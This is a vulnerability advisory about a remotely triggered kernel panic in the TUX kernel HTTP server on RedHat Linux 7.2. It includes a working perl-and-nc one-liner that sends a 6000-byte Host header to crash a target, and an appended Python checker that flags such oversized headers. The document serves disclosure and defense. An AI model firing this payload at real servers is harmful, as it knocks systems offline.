COMMAND

    kernel httpd

SYSTEMS AFFECTED

    RedHat Linux 7.2:
    0) Kernel(s) 2.4.7-10 and 2.4.9-7
    0) TUX-2.1.0-2.
    (At least)

PROBLEM

    Aiden ORawe posted:

    Tux is a Kernel-Space HTTP server coded for optimal performance (IRQ Affinity, HTTP Compression, direct scatter-gather DMA etc.) and is meant to be used as the main HTTP server for static objects with requests for dynamic content being passed to a user-space HTTPD server such as Apache on same box when necessary. The TUX web server is disabled by default.

    It is possible to cause a denial of service condition by submitting an oversized "Host:" header request to the Tux daemon causing an assertion failure and eventual Kernel Panic. A total system reboot is required to return the box to full functionality.

    For example the following script:

        perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 . qq(\n)" |nc <ip address> 80

    Will cause the affected box to crash with the below output (edited for brevity):

        Code: Bad EIP Value.
        (0)Kernel Panic: Aiee, killing interrupt handler!
        In interrupt handler - not syncing!

    Despite being able to affect the contents of the EIP register this vulnerability cannot, to the best of my understanding, be utilised to provide for a remote root compromise.

SOLUTION

    See Security Advisory - RHSA-2001:142-15

    http://www.redhat.com/support/errata/RHSA-2001-142.html
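
A defensive check for the condition described above, as an added example that is not part of the original advisory or of TUX: it inspects a raw request head and reports Host headers or header lines that exceed a size limit, so a filtering proxy or a log review can reject or flag them. The limits, the function name and the sample requests are assumptions.

```python
import re

# Assumed policy limits (not from the advisory): a DNS name is at most 253
# bytes, plus ":65535" for a port; 4096 bytes per header line.
MAX_HOST_LEN = 253 + 6
MAX_LINE_LEN = 4096
HOST_RE = re.compile(rb"(\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9.-]+)(:\d{1,5})?")

def check_request(raw: bytes) -> list[str]:
    """Return the reasons to reject a request head; an empty list means pass."""
    findings = []
    # Accept bare-LF line endings too: the request in the advisory uses them.
    head = raw.replace(b"\r\n", b"\n").split(b"\n\n", 1)[0]
    hosts = 0
    for n, line in enumerate(head.split(b"\n")[1:], start=2):
        if not line:
            continue
        if len(line) > MAX_LINE_LEN:
            findings.append(f"line {n}: header line is {len(line)} bytes")
        name, sep, value = line.partition(b":")
        if not sep:
            findings.append(f"line {n}: header without a colon")
            continue
        if name.strip().lower() != b"host":
            continue
        hosts += 1
        value = value.strip()
        if len(value) > MAX_HOST_LEN:
            findings.append(f"line {n}: Host value is {len(value)} bytes")
        elif not HOST_RE.fullmatch(value):
            findings.append(f"line {n}: Host value is not host[:port]")
    if hosts > 1:
        findings.append("more than one Host header")
    return findings

# Constructed samples; the second uses the 6000-byte Host value size and the
# bare-LF, unterminated layout described in the advisory.
NORMAL = b"GET / HTTP/1.0\r\nAccept: */*\r\nHost: www.example.com\r\n\r\n"
OVERSIZED = b"GET / HTTP/1.0\nAccept: */*\nHost: " + b"A" * 6000 + b"\n"

if __name__ == "__main__":
    for label, req in (("normal", NORMAL), ("oversized", OVERSIZED)):
        print(label, check_request(req) or "pass")
```
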